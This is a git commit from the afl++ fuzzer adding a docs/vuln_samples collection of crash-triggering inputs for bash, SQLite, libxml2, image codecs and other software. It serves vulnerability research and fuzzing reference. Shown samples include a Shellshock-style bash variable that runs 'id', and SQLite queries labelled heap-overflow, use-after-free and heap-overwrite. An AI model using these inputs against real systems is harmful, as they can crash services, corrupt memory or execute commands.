From f367728c4435670caf2e9cc5acad257e7766cc65 Mon Sep 17 00:00:00 2001
From: van Hauser <vh@thc.org>
Date: Tue, 28 May 2019 16:40:24 +0200
Subject: afl++ 2.52c initial commit

---
 docs/vuln_samples/bash-cmd-exec.var                   |   1 +
 docs/vuln_samples/bash-uninit-mem.var                 |   1 +
 docs/vuln_samples/ffmpeg-h264-bad-ptr-800m.mp4        | Bin 0 -> 10377 bytes
 docs/vuln_samples/ffmpeg-h264-bad-read.mp4            | Bin 0 -> 4376 bytes
 docs/vuln_samples/ffmpeg-h264-call-stack-overflow.mp4 | Bin 0 -> 1259 bytes
 docs/vuln_samples/file-fpu-exception.elf              | Bin 0 -> 2572 bytes
 docs/vuln_samples/firefox-bmp-leak.bmp                | Bin 0 -> 892 bytes
 docs/vuln_samples/firefox-chrome-leak.jpg             | Bin 0 -> 1771 bytes
 docs/vuln_samples/firefox-gif-leak.gif                | Bin 0 -> 38 bytes
 docs/vuln_samples/firefox-gif-leak2.gif               | Bin 0 -> 179 bytes
 docs/vuln_samples/jxrlib-crash.jxr                    | Bin 0 -> 512 bytes
 docs/vuln_samples/jxrlib-crash2.jxr                   | Bin 0 -> 472 bytes
 docs/vuln_samples/jxrlib-crash3.jxr                   | Bin 0 -> 492 bytes
 docs/vuln_samples/jxrlib-crash4.jxr                   | Bin 0 -> 526 bytes
 docs/vuln_samples/lesspipe-cpio-bad-write.cpio        | Bin 0 -> 512 bytes
 docs/vuln_samples/libjpeg-sos-leak.jpg                | Bin 0 -> 642 bytes
 docs/vuln_samples/libjpeg-turbo-dht-leak.jpg          | Bin 0 -> 595 bytes
 docs/vuln_samples/libtiff-bad-write.tif               | Bin 0 -> 360 bytes
 docs/vuln_samples/libtiff-uninit-mem.tif              | Bin 0 -> 408 bytes
 docs/vuln_samples/libtiff-uninit-mem2.tif             | Bin 0 -> 408 bytes
 docs/vuln_samples/libtiff-uninit-mem3.tif             | Bin 0 -> 216 bytes
 docs/vuln_samples/libtiff-uninit-mem4.tif             | Bin 0 -> 216 bytes
 docs/vuln_samples/libxml2-bad-read.xml                |   3 +++
 docs/vuln_samples/msie-dht-leak.jpg                   | Bin 0 -> 876 bytes
 docs/vuln_samples/msie-jxr-mem-leak.jxr               | Bin 0 -> 882 bytes
 docs/vuln_samples/msie-png-mem-leak.png               | Bin 0 -> 293 bytes
 docs/vuln_samples/msie-tiff-mem-leak.tif              | Bin 0 -> 408 bytes
 docs/vuln_samples/msie-zlib-dos.png                   | Bin 0 -> 434 bytes
 docs/vuln_samples/openssl-null-ptr.der                | Bin 0 -> 15 bytes
 docs/vuln_samples/openssl-null-ptr2.der               | Bin 0 -> 398 bytes
 docs/vuln_samples/photoshop-mem-leak.jpg              | Bin 0 -> 996 bytes
 docs/vuln_samples/sqlite-bad-free.sql                 |   2 ++
 docs/vuln_samples/sqlite-bad-ptr.sql                  |   1 +
 docs/vuln_samples/sqlite-bad-ptr2.sql                 |   1 +
 docs/vuln_samples/sqlite-bad-ptr3.sql                 | Bin 0 -> 199 bytes
 docs/vuln_samples/sqlite-heap-overflow.sql            |   2 ++
 docs/vuln_samples/sqlite-heap-overwrite.sql           |   1 +
 docs/vuln_samples/sqlite-negative-memset.sql          |   1 +
 docs/vuln_samples/sqlite-null-ptr1.sql                |   2 ++
 docs/vuln_samples/sqlite-null-ptr10.sql               |   1 +
 docs/vuln_samples/sqlite-null-ptr11.sql               |   1 +
 docs/vuln_samples/sqlite-null-ptr12.sql               |   1 +
 docs/vuln_samples/sqlite-null-ptr13.sql               |   1 +
 docs/vuln_samples/sqlite-null-ptr14.sql               |   1 +
 docs/vuln_samples/sqlite-null-ptr15.sql               |   1 +
 docs/vuln_samples/sqlite-null-ptr2.sql                |   1 +
 docs/vuln_samples/sqlite-null-ptr3.sql                |   1 +
 docs/vuln_samples/sqlite-null-ptr4.sql                |   1 +
 docs/vuln_samples/sqlite-null-ptr5.sql                |   1 +
 docs/vuln_samples/sqlite-null-ptr6.sql                |   1 +
 docs/vuln_samples/sqlite-null-ptr7.sql                |   1 +
 docs/vuln_samples/sqlite-null-ptr8.sql                |   1 +
 docs/vuln_samples/sqlite-null-ptr9.sql                |   1 +
 docs/vuln_samples/sqlite-oob-read.sql                 |   1 +
 docs/vuln_samples/sqlite-oob-write.sql                |   6 ++++++
 docs/vuln_samples/sqlite-stack-buf-overflow.sql       |   1 +
 docs/vuln_samples/sqlite-stack-exhaustion.sql         |   1 +
 docs/vuln_samples/sqlite-unint-mem.sql                |   1 +
 docs/vuln_samples/sqlite-use-after-free.sql           |   1 +
 docs/vuln_samples/strings-bfd-badptr.elf              | Bin 0 -> 324 bytes
 docs/vuln_samples/strings-bfd-badptr2.elf             | Bin 0 -> 324 bytes
 docs/vuln_samples/strings-stack-overflow              |   3 +++
 docs/vuln_samples/strings-unchecked-ctr.elf           | Bin 0 -> 141 bytes
 docs/vuln_samples/tcpdump-arp-crash.pcap              | Bin 0 -> 114 bytes
 docs/vuln_samples/tcpdump-ppp-crash.pcap              | Bin 0 -> 1126 bytes
 docs/vuln_samples/unrtf-arbitrary-read.rtf            | Bin 0 -> 551 bytes
 docs/vuln_samples/unzip-t-mem-corruption.zip          | Bin 0 -> 344 bytes
 67 files changed, 43 insertions(+)
 create mode 100644 docs/vuln_samples/bash-cmd-exec.var
 create mode 100644 docs/vuln_samples/bash-uninit-mem.var
 create mode 100644 docs/vuln_samples/ffmpeg-h264-bad-ptr-800m.mp4
 create mode 100644 docs/vuln_samples/ffmpeg-h264-bad-read.mp4
 create mode 100644 docs/vuln_samples/ffmpeg-h264-call-stack-overflow.mp4
 create mode 100644 docs/vuln_samples/file-fpu-exception.elf
 create mode 100644 docs/vuln_samples/firefox-bmp-leak.bmp
 create mode 100644 docs/vuln_samples/firefox-chrome-leak.jpg
 create mode 100644 docs/vuln_samples/firefox-gif-leak.gif
 create mode 100644 docs/vuln_samples/firefox-gif-leak2.gif
 create mode 100644 docs/vuln_samples/jxrlib-crash.jxr
 create mode 100644 docs/vuln_samples/jxrlib-crash2.jxr
 create mode 100644 docs/vuln_samples/jxrlib-crash3.jxr
 create mode 100644 docs/vuln_samples/jxrlib-crash4.jxr
 create mode 100644 docs/vuln_samples/lesspipe-cpio-bad-write.cpio
 create mode 100644 docs/vuln_samples/libjpeg-sos-leak.jpg
 create mode 100644 docs/vuln_samples/libjpeg-turbo-dht-leak.jpg
 create mode 100644 docs/vuln_samples/libtiff-bad-write.tif
 create mode 100644 docs/vuln_samples/libtiff-uninit-mem.tif
 create mode 100644 docs/vuln_samples/libtiff-uninit-mem2.tif
 create mode 100644 docs/vuln_samples/libtiff-uninit-mem3.tif
 create mode 100644 docs/vuln_samples/libtiff-uninit-mem4.tif
 create mode 100644 docs/vuln_samples/libxml2-bad-read.xml
 create mode 100644 docs/vuln_samples/msie-dht-leak.jpg
 create mode 100644 docs/vuln_samples/msie-jxr-mem-leak.jxr
 create mode 100644 docs/vuln_samples/msie-png-mem-leak.png
 create mode 100644 docs/vuln_samples/msie-tiff-mem-leak.tif
 create mode 100644 docs/vuln_samples/msie-zlib-dos.png
 create mode 100644 docs/vuln_samples/openssl-null-ptr.der
 create mode 100644 docs/vuln_samples/openssl-null-ptr2.der
 create mode 100644 docs/vuln_samples/photoshop-mem-leak.jpg
 create mode 100644 docs/vuln_samples/sqlite-bad-free.sql
 create mode 100644 docs/vuln_samples/sqlite-bad-ptr.sql
 create mode 100644 docs/vuln_samples/sqlite-bad-ptr2.sql
 create mode 100644 docs/vuln_samples/sqlite-bad-ptr3.sql
 create mode 100644 docs/vuln_samples/sqlite-heap-overflow.sql
 create mode 100644 docs/vuln_samples/sqlite-heap-overwrite.sql
 create mode 100644 docs/vuln_samples/sqlite-negative-memset.sql
 create mode 100644 docs/vuln_samples/sqlite-null-ptr1.sql
 create mode 100644 docs/vuln_samples/sqlite-null-ptr10.sql
 create mode 100644 docs/vuln_samples/sqlite-null-ptr11.sql
 create mode 100644 docs/vuln_samples/sqlite-null-ptr12.sql
 create mode 100644 docs/vuln_samples/sqlite-null-ptr13.sql
 create mode 100644 docs/vuln_samples/sqlite-null-ptr14.sql
 create mode 100644 docs/vuln_samples/sqlite-null-ptr15.sql
 create mode 100644 docs/vuln_samples/sqlite-null-ptr2.sql
 create mode 100644 docs/vuln_samples/sqlite-null-ptr3.sql
 create mode 100644 docs/vuln_samples/sqlite-null-ptr4.sql
 create mode 100644 docs/vuln_samples/sqlite-null-ptr5.sql
 create mode 100644 docs/vuln_samples/sqlite-null-ptr6.sql
 create mode 100644 docs/vuln_samples/sqlite-null-ptr7.sql
 create mode 100644 docs/vuln_samples/sqlite-null-ptr8.sql
 create mode 100644 docs/vuln_samples/sqlite-null-ptr9.sql
 create mode 100644 docs/vuln_samples/sqlite-oob-read.sql
 create mode 100644 docs/vuln_samples/sqlite-oob-write.sql
 create mode 100644 docs/vuln_samples/sqlite-stack-buf-overflow.sql
 create mode 100644 docs/vuln_samples/sqlite-stack-exhaustion.sql
 create mode 100644 docs/vuln_samples/sqlite-unint-mem.sql
 create mode 100644 docs/vuln_samples/sqlite-use-after-free.sql
 create mode 100644 docs/vuln_samples/strings-bfd-badptr.elf
 create mode 100644 docs/vuln_samples/strings-bfd-badptr2.elf
 create mode 100644 docs/vuln_samples/strings-stack-overflow
 create mode 100644 docs/vuln_samples/strings-unchecked-ctr.elf
 create mode 100644 docs/vuln_samples/tcpdump-arp-crash.pcap
 create mode 100644 docs/vuln_samples/tcpdump-ppp-crash.pcap
 create mode 100644 docs/vuln_samples/unrtf-arbitrary-read.rtf
 create mode 100644 docs/vuln_samples/unzip-t-mem-corruption.zip

(limited to 'docs/vuln_samples')

diff --git a/docs/vuln_samples/bash-cmd-exec.var b/docs/vuln_samples/bash-cmd-exec.var
new file mode 100644
index 00000000..6422d427
--- /dev/null
+++ b/docs/vuln_samples/bash-cmd-exec.var
@@ -0,0 +1 @@
+() { _; } >_[$($())] { id; }
\ No newline at end of file
diff --git a/docs/vuln_samples/bash-uninit-mem.var b/docs/vuln_samples/bash-uninit-mem.var
new file mode 100644
index 00000000..6d7d5360
--- /dev/null
+++ b/docs/vuln_samples/bash-uninit-mem.var
@@ -0,0 +1 @@
+() { x() { _; }; x() { _; } <<a; }
\ No newline at end of file
diff --git a/docs/vuln_samples/ffmpeg-h264-bad-ptr-800m.mp4 b/docs/vuln_samples/ffmpeg-h264-bad-ptr-800m.mp4
new file mode 100644
index 00000000..ce23a8bd
Binary files /dev/null and b/docs/vuln_samples/ffmpeg-h264-bad-ptr-800m.mp4 differ
diff --git a/docs/vuln_samples/ffmpeg-h264-bad-read.mp4 b/docs/vuln_samples/ffmpeg-h264-bad-read.mp4
new file mode 100644
index 00000000..57a0ac90
Binary files /dev/null and b/docs/vuln_samples/ffmpeg-h264-bad-read.mp4 differ
diff --git a/docs/vuln_samples/ffmpeg-h264-call-stack-overflow.mp4 b/docs/vuln_samples/ffmpeg-h264-call-stack-overflow.mp4
new file mode 100644
index 00000000..5471105e
Binary files /dev/null and b/docs/vuln_samples/ffmpeg-h264-call-stack-overflow.mp4 differ
diff --git a/docs/vuln_samples/file-fpu-exception.elf b/docs/vuln_samples/file-fpu-exception.elf
new file mode 100644
index 00000000..f3a36ef8
Binary files /dev/null and b/docs/vuln_samples/file-fpu-exception.elf differ
diff --git a/docs/vuln_samples/firefox-bmp-leak.bmp b/docs/vuln_samples/firefox-bmp-leak.bmp
new file mode 100644
index 00000000..857e2426
Binary files /dev/null and b/docs/vuln_samples/firefox-bmp-leak.bmp differ
diff --git a/docs/vuln_samples/firefox-chrome-leak.jpg b/docs/vuln_samples/firefox-chrome-leak.jpg
new file mode 100644
index 00000000..a642d98e
Binary files /dev/null and b/docs/vuln_samples/firefox-chrome-leak.jpg differ
diff --git a/docs/vuln_samples/firefox-gif-leak.gif b/docs/vuln_samples/firefox-gif-leak.gif
new file mode 100644
index 00000000..310cd366
Binary files /dev/null and b/docs/vuln_samples/firefox-gif-leak.gif differ
diff --git a/docs/vuln_samples/firefox-gif-leak2.gif b/docs/vuln_samples/firefox-gif-leak2.gif
new file mode 100644
index 00000000..bb41696c
Binary files /dev/null and b/docs/vuln_samples/firefox-gif-leak2.gif differ
diff --git a/docs/vuln_samples/jxrlib-crash.jxr b/docs/vuln_samples/jxrlib-crash.jxr
new file mode 100644
index 00000000..71d190e3
Binary files /dev/null and b/docs/vuln_samples/jxrlib-crash.jxr differ
diff --git a/docs/vuln_samples/jxrlib-crash2.jxr b/docs/vuln_samples/jxrlib-crash2.jxr
new file mode 100644
index 00000000..08313258
Binary files /dev/null and b/docs/vuln_samples/jxrlib-crash2.jxr differ
diff --git a/docs/vuln_samples/jxrlib-crash3.jxr b/docs/vuln_samples/jxrlib-crash3.jxr
new file mode 100644
index 00000000..47af7f1e
Binary files /dev/null and b/docs/vuln_samples/jxrlib-crash3.jxr differ
diff --git a/docs/vuln_samples/jxrlib-crash4.jxr b/docs/vuln_samples/jxrlib-crash4.jxr
new file mode 100644
index 00000000..51daf47d
Binary files /dev/null and b/docs/vuln_samples/jxrlib-crash4.jxr differ
diff --git a/docs/vuln_samples/lesspipe-cpio-bad-write.cpio b/docs/vuln_samples/lesspipe-cpio-bad-write.cpio
new file mode 100644
index 00000000..ec5a992d
Binary files /dev/null and b/docs/vuln_samples/lesspipe-cpio-bad-write.cpio differ
diff --git a/docs/vuln_samples/libjpeg-sos-leak.jpg b/docs/vuln_samples/libjpeg-sos-leak.jpg
new file mode 100644
index 00000000..02653b87
Binary files /dev/null and b/docs/vuln_samples/libjpeg-sos-leak.jpg differ
diff --git a/docs/vuln_samples/libjpeg-turbo-dht-leak.jpg b/docs/vuln_samples/libjpeg-turbo-dht-leak.jpg
new file mode 100644
index 00000000..cfc21a8a
Binary files /dev/null and b/docs/vuln_samples/libjpeg-turbo-dht-leak.jpg differ
diff --git a/docs/vuln_samples/libtiff-bad-write.tif b/docs/vuln_samples/libtiff-bad-write.tif
new file mode 100644
index 00000000..45027cd1
Binary files /dev/null and b/docs/vuln_samples/libtiff-bad-write.tif differ
diff --git a/docs/vuln_samples/libtiff-uninit-mem.tif b/docs/vuln_samples/libtiff-uninit-mem.tif
new file mode 100644
index 00000000..b94e2a93
Binary files /dev/null and b/docs/vuln_samples/libtiff-uninit-mem.tif differ
diff --git a/docs/vuln_samples/libtiff-uninit-mem2.tif b/docs/vuln_samples/libtiff-uninit-mem2.tif
new file mode 100644
index 00000000..0f9711bf
Binary files /dev/null and b/docs/vuln_samples/libtiff-uninit-mem2.tif differ
diff --git a/docs/vuln_samples/libtiff-uninit-mem3.tif b/docs/vuln_samples/libtiff-uninit-mem3.tif
new file mode 100644
index 00000000..6889a3de
Binary files /dev/null and b/docs/vuln_samples/libtiff-uninit-mem3.tif differ
diff --git a/docs/vuln_samples/libtiff-uninit-mem4.tif b/docs/vuln_samples/libtiff-uninit-mem4.tif
new file mode 100644
index 00000000..98af970f
Binary files /dev/null and b/docs/vuln_samples/libtiff-uninit-mem4.tif differ
diff --git a/docs/vuln_samples/libxml2-bad-read.xml b/docs/vuln_samples/libxml2-bad-read.xml
new file mode 100644
index 00000000..d46fd128
--- /dev/null
+++ b/docs/vuln_samples/libxml2-bad-read.xml
@@ -0,0 +1,3 @@
+<!DOCTYPEd[<!ENTITY
+S	""><!ENTITY %
+N	"<!ELEMENT<![INCLUDE0"<!ENTITYL%N;
\ No newline at end of file
diff --git a/docs/vuln_samples/msie-dht-leak.jpg b/docs/vuln_samples/msie-dht-leak.jpg
new file mode 100644
index 00000000..a0fb121c
Binary files /dev/null and b/docs/vuln_samples/msie-dht-leak.jpg differ
diff --git a/docs/vuln_samples/msie-jxr-mem-leak.jxr b/docs/vuln_samples/msie-jxr-mem-leak.jxr
new file mode 100644
index 00000000..519f9c13
Binary files /dev/null and b/docs/vuln_samples/msie-jxr-mem-leak.jxr differ
diff --git a/docs/vuln_samples/msie-png-mem-leak.png b/docs/vuln_samples/msie-png-mem-leak.png
new file mode 100644
index 00000000..bc193bf9
Binary files /dev/null and b/docs/vuln_samples/msie-png-mem-leak.png differ
diff --git a/docs/vuln_samples/msie-tiff-mem-leak.tif b/docs/vuln_samples/msie-tiff-mem-leak.tif
new file mode 100644
index 00000000..7e937c9b
Binary files /dev/null and b/docs/vuln_samples/msie-tiff-mem-leak.tif differ
diff --git a/docs/vuln_samples/msie-zlib-dos.png b/docs/vuln_samples/msie-zlib-dos.png
new file mode 100644
index 00000000..df3ab80b
Binary files /dev/null and b/docs/vuln_samples/msie-zlib-dos.png differ
diff --git a/docs/vuln_samples/openssl-null-ptr.der b/docs/vuln_samples/openssl-null-ptr.der
new file mode 100644
index 00000000..dd3975d6
Binary files /dev/null and b/docs/vuln_samples/openssl-null-ptr.der differ
diff --git a/docs/vuln_samples/openssl-null-ptr2.der b/docs/vuln_samples/openssl-null-ptr2.der
new file mode 100644
index 00000000..85cf6b05
Binary files /dev/null and b/docs/vuln_samples/openssl-null-ptr2.der differ
diff --git a/docs/vuln_samples/photoshop-mem-leak.jpg b/docs/vuln_samples/photoshop-mem-leak.jpg
new file mode 100644
index 00000000..5b9f5917
Binary files /dev/null and b/docs/vuln_samples/photoshop-mem-leak.jpg differ
diff --git a/docs/vuln_samples/sqlite-bad-free.sql b/docs/vuln_samples/sqlite-bad-free.sql
new file mode 100644
index 00000000..4e37f49c
--- /dev/null
+++ b/docs/vuln_samples/sqlite-bad-free.sql
@@ -0,0 +1,2 @@
+create table t0(o CHar(0)CHECK(0&O>O));insert into t0
+select randomblob(0)-trim(0);
diff --git a/docs/vuln_samples/sqlite-bad-ptr.sql b/docs/vuln_samples/sqlite-bad-ptr.sql
new file mode 100644
index 00000000..46e78afa
--- /dev/null
+++ b/docs/vuln_samples/sqlite-bad-ptr.sql
@@ -0,0 +1 @@
+SELECT 0 UNION SELECT 0 ORDER BY 1 COLLATE"""""""";
diff --git a/docs/vuln_samples/sqlite-bad-ptr2.sql b/docs/vuln_samples/sqlite-bad-ptr2.sql
new file mode 100644
index 00000000..cd613d08
--- /dev/null
+++ b/docs/vuln_samples/sqlite-bad-ptr2.sql
@@ -0,0 +1 @@
+PRAGMA foreign_keys=1;CREATE TABLE t1("""0"PRIMARY KEy REFERENCES t1 ON DELETE SET NULL);REPLACE INTO t1 SELECT(0);
diff --git a/docs/vuln_samples/sqlite-bad-ptr3.sql b/docs/vuln_samples/sqlite-bad-ptr3.sql
new file mode 100644
index 00000000..7518816c
Binary files /dev/null and b/docs/vuln_samples/sqlite-bad-ptr3.sql differ
diff --git a/docs/vuln_samples/sqlite-heap-overflow.sql b/docs/vuln_samples/sqlite-heap-overflow.sql
new file mode 100644
index 00000000..066fc835
--- /dev/null
+++ b/docs/vuln_samples/sqlite-heap-overflow.sql
@@ -0,0 +1,2 @@
+DROP TABLE IF EXISTS t;CREATE VIRTUAL TABLE t0 USING fts4();insert into t0 select zeroblob(0);SAVEPOINT O;insert into t0
+select(0);SAVEPOINT E;insert into t0 SELECT 0 UNION SELECT 0'x'ORDER BY x;
diff --git a/docs/vuln_samples/sqlite-heap-overwrite.sql b/docs/vuln_samples/sqlite-heap-overwrite.sql
new file mode 100644
index 00000000..51ed82c3
--- /dev/null
+++ b/docs/vuln_samples/sqlite-heap-overwrite.sql
@@ -0,0 +1 @@
+ATTACH "file:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA?mode=memory&cache=shared" AS x;
\ No newline at end of file
diff --git a/docs/vuln_samples/sqlite-negative-memset.sql b/docs/vuln_samples/sqlite-negative-memset.sql
new file mode 100644
index 00000000..d647bea0
--- /dev/null
+++ b/docs/vuln_samples/sqlite-negative-memset.sql
@@ -0,0 +1 @@
